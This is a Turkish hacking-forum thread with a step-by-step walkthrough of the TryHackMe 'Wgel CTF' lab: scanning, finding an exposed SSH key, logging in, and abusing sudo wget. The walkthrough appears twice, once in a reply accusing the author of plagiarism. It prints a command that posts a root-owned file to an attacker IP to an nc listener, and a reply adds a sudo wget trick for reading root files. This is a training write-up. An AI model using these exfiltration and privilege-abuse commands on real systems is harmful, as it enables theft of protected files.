TryHackMe CTF Çözümü: Wgel CTF

M4401

Yeni üye
19 May 2022
8
3
Öncelikle Hepinize Merhaba Arkadaşlar. Bu konumda Adım adım TryHackMe Sitesinde Bulunan "Wgel CTF" Makinasını çözeceğim.
Olabildiğince Adım adım ilerleyeceğimiz için CTF çözüm mantığını kavramış olacaksınız.


O HALDE HADİ BAŞLAYALIM...

968135.jpg


Adım 1: Port Taraması
Bu Adımda NMAP Aracı yardımıyla hedef makinada bir Port taraması yapacağız.

1*rhMoIx5z03iCORiNA3-ByA.png


Gördüğünüz gibi NMAP Taramasıyla istediğimiz çıktıyı almış olduk. 22/tcp ve 80/tcp Portları sistem üzerinde açık olan portlarmış.


Adım 2: İşetim sistemi ve servis taraması
Bu adımda ise Hedefin İşletim sistemi ve Hedef üzerinde çalışan servisler hakkında bilgi alacağız.

1*rrOBEuHXtHq-xPUXvbLITA.png


Adım 3: HTTP Sitesine Erişim
1*8E9VWVqZXpzYKi5vDmR-Ig.png


Sayfa kaynağını görüntüleyin, bir mesaj var. Jessie olan bir kullanıcı adı var gibi gözüküyor.

1*V7CSYaM9jf549i_nAlT6vg.png


Adım 4: Gobuster aracı ile Tarayalım
Bu adımda devreye Gobuster aracı giriyor. Gobuster aracıyla bir dizin taraması yapalım.

1*3q7BX-yB1wg2131SNh8yuA.png


evet çıktımız ekrana geldi. bir site haritası varmış, hadi bakalım.

1*_muJejWkmNp7xJ3a6zlBfw.png


Adım 5: Gobuster ile Site haritasını tarayalım
Bu adımda ise bir önceki adımda bulduğumuz site haritasına bir dizin taramsı yapalım, bu işlem içinde yine Gobuster aracını kullacağım.

1*xdGTSl2tPH5uamZCbVcMmw.png

evet çıktılar tekrar geldi. Açıkçası fazla bir şey. Ama yine de devam ediyoruz.


Adım 6: Site haritasını gobuster ile başka bir kelime listesiyle tarayalım
Evet bu seferde site haritasını farklı bir kelime listesiyle tarayalım.

1*7zVa40-PEfjO5DGAXZIJmg.png


Adım 7: Şimdi ssh hizmetinin özel anahtarını bulduk
1*hLI4jUFzTc0zlkAv7VC-8Q.png


1*da_zx7N4lFyQsgNt60ijew.png


Adım 8: Bir önceki adımda bulduklarımızı indirelerim
Bunları indirmek için "wget" komutu kullanabiliriz.

Kod:
wget http://<ip>/sitemap/.ssh/id_rsa

1*d6rBIrMnBt1dO97eQ_P3pw.png


Adım 9: Şimdi ise İzinleri Değişterelim
Bunun içinde "chmod" komutunu kullanacağız.

Kod:
chmod 600 id_rsa

1*udu_xo9FEENb-zreA0Ozgg.png


Adım 10: SSH İle giriş yapalım
Bu işlemi yapmak içinde bir komuta ihtiyacımız olacak.

Kod:
ssh -i id_rsa jessie@<ip>

1*vvyK_ELfrsPRpqlLwjNo7A.png


Adım 11: /home/jessie'yi bulalım
Bu işlemi yapabilmek için bazı komutalara ihtiyacımız var.

Kod:
ls[/COLOR][/I][/B][/CENTER][/I][/B][/CENTER][/I][/B][/CENTER][/I][/B][/CENTER][/I][/B][/CENTER]
[B][I][CENTER][B][I][CENTER][B][I][CENTER][B][I][CENTER][B][I][COLOR=rgb(255, 255, 255)][CENTER]cd Masaüstü
ls
cd..
cd Belgeleri
ls
cat user_flag.txt






1*yxlt7TtOCVum9mx5yvgQpg.png


Adım 12: Jessie'nin sudo kullanıp kullanmadığını kontrol edelim
Bunun için ise yeni bir kod yazmamız gerekir.

Kod:
sudo -l

wget var. Makineme bayrağı göndermek için kullanabilirim.

1*XM12yzkFvVD24Z_igxOGwA.png


Adım 13: bayrak dosyası için dinleyici oluşturun
Bu adımda ise Bayrak için bir dosya oluşturacağız.

Kod:
nc -lvp 80 > root.txt

1*BjefR2XwzBEb6XZrOIRXhw.png


Adım 14: Dosyayı gönderelim
Dosyayı göndermek için bir kod kullanacağız tekrar.

Kod:
sudo wget --post-file=/root/root_flag.txt <attacker ip>

1*VOiX1pYlWZkx4YO-TDUWGQ.png


Adım 15(son adım): Bayrak Dosyasını okuyun
Evet, artık son adıma geldik. HADİ GEREKENİ YAPALIM..


Kod:
ls
cat root_flag.txt

1*XDd2HD9_9uCNFTQggf90RQ.png


968135.jpg


SAYGILARIMLA
Ben Bunu Başka Yerde gördüm Sanki Alıntı Konu Lütfen kendimizi Kandırmayalim🙂🙂
 

GökBörü.

Uzman üye
20 Haz 2021
1,815
1,047
Kara Harp Okulu
Öncelikle Hepinize Merhaba Arkadaşlar. Bu konumda Adım adım TryHackMe Sitesinde Bulunan "Wgel CTF" Makinasını çözeceğim.
Olabildiğince Adım adım ilerleyeceğimiz için CTF çözüm mantığını kavramış olacaksınız.


O HALDE HADİ BAŞLAYALIM...

968135.jpg


Adım 1: Port Taraması
Bu Adımda NMAP Aracı yardımıyla hedef makinada bir Port taraması yapacağız.

1*rhMoIx5z03iCORiNA3-ByA.png


Gördüğünüz gibi NMAP Taramasıyla istediğimiz çıktıyı almış olduk. 22/tcp ve 80/tcp Portları sistem üzerinde açık olan portlarmış.


Adım 2: İşetim sistemi ve servis taraması
Bu adımda ise Hedefin İşletim sistemi ve Hedef üzerinde çalışan servisler hakkında bilgi alacağız.

1*rrOBEuHXtHq-xPUXvbLITA.png


Adım 3: HTTP Sitesine Erişim
1*8E9VWVqZXpzYKi5vDmR-Ig.png


Sayfa kaynağını görüntüleyin, bir mesaj var. Jessie olan bir kullanıcı adı var gibi gözüküyor.

1*V7CSYaM9jf549i_nAlT6vg.png


Adım 4: Gobuster aracı ile Tarayalım
Bu adımda devreye Gobuster aracı giriyor. Gobuster aracıyla bir dizin taraması yapalım.

1*3q7BX-yB1wg2131SNh8yuA.png


evet çıktımız ekrana geldi. bir site haritası varmış, hadi bakalım.

1*_muJejWkmNp7xJ3a6zlBfw.png


Adım 5: Gobuster ile Site haritasını tarayalım
Bu adımda ise bir önceki adımda bulduğumuz site haritasına bir dizin taramsı yapalım, bu işlem içinde yine Gobuster aracını kullacağım.

1*xdGTSl2tPH5uamZCbVcMmw.png

evet çıktılar tekrar geldi. Açıkçası fazla bir şey. Ama yine de devam ediyoruz.


Adım 6: Site haritasını gobuster ile başka bir kelime listesiyle tarayalım
Evet bu seferde site haritasını farklı bir kelime listesiyle tarayalım.

1*7zVa40-PEfjO5DGAXZIJmg.png


Adım 7: Şimdi ssh hizmetinin özel anahtarını bulduk
1*hLI4jUFzTc0zlkAv7VC-8Q.png


1*da_zx7N4lFyQsgNt60ijew.png


Adım 8: Bir önceki adımda bulduklarımızı indirelerim
Bunları indirmek için "wget" komutu kullanabiliriz.

Kod:
wget http://<ip>/sitemap/.ssh/id_rsa

1*d6rBIrMnBt1dO97eQ_P3pw.png


Adım 9: Şimdi ise İzinleri Değişterelim
Bunun içinde "chmod" komutunu kullanacağız.

Kod:
chmod 600 id_rsa

1*udu_xo9FEENb-zreA0Ozgg.png


Adım 10: SSH İle giriş yapalım
Bu işlemi yapmak içinde bir komuta ihtiyacımız olacak.

Kod:
ssh -i id_rsa jessie@<ip>

1*vvyK_ELfrsPRpqlLwjNo7A.png


Adım 11: /home/jessie'yi bulalım
Bu işlemi yapabilmek için bazı komutalara ihtiyacımız var.

Kod:
ls[/COLOR][/I][/B][/CENTER][/I][/B][/CENTER][/I][/B][/CENTER][/I][/B][/CENTER][/I][/B][/CENTER]
[B][I][CENTER][B][I][CENTER][B][I][CENTER][B][I][CENTER][B][I][COLOR=rgb(255, 255, 255)][CENTER]cd Masaüstü
ls
cd..
cd Belgeleri
ls
cat user_flag.txt






1*yxlt7TtOCVum9mx5yvgQpg.png


Adım 12: Jessie'nin sudo kullanıp kullanmadığını kontrol edelim
Bunun için ise yeni bir kod yazmamız gerekir.

Kod:
sudo -l

wget var. Makineme bayrağı göndermek için kullanabilirim.

1*XM12yzkFvVD24Z_igxOGwA.png


Adım 13: bayrak dosyası için dinleyici oluşturun
Bu adımda ise Bayrak için bir dosya oluşturacağız.

Kod:
nc -lvp 80 > root.txt

1*BjefR2XwzBEb6XZrOIRXhw.png


Adım 14: Dosyayı gönderelim
Dosyayı göndermek için bir kod kullanacağız tekrar.

Kod:
sudo wget --post-file=/root/root_flag.txt <attacker ip>

1*VOiX1pYlWZkx4YO-TDUWGQ.png


Adım 15(son adım): Bayrak Dosyasını okuyun
Evet, artık son adıma geldik. HADİ GEREKENİ YAPALIM..


Kod:
ls
cat root_flag.txt

1*XDd2HD9_9uCNFTQggf90RQ.png


968135.jpg


SAYGILARIMLA
TryHackMe: Wgel CTF kendini kandırırsın.
 

SixCode

Üye
18 Haz 2021
102
30
Türkiye
Ellerinize Sağlık.

Ben root_flag.txt yi okuma konusunda daha kolay bir yol buldum.
Bash:
sudo /usr/bin/wget -i /root/root_flag.txt

Bu komutu kullanarak root dizini içerisindeki root dosyasını okuyabiliriz.
Aslında wget üzerinde dosya okumak için uygun bir fonksiyon bulunmuyor fakat bu komut bir dosyayı okuyup ulaştığı veriyi bağlantı oluşturulacak ip olarak kullanıyor.

Yanlış anlamayın sadece paylaşmak istedim.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.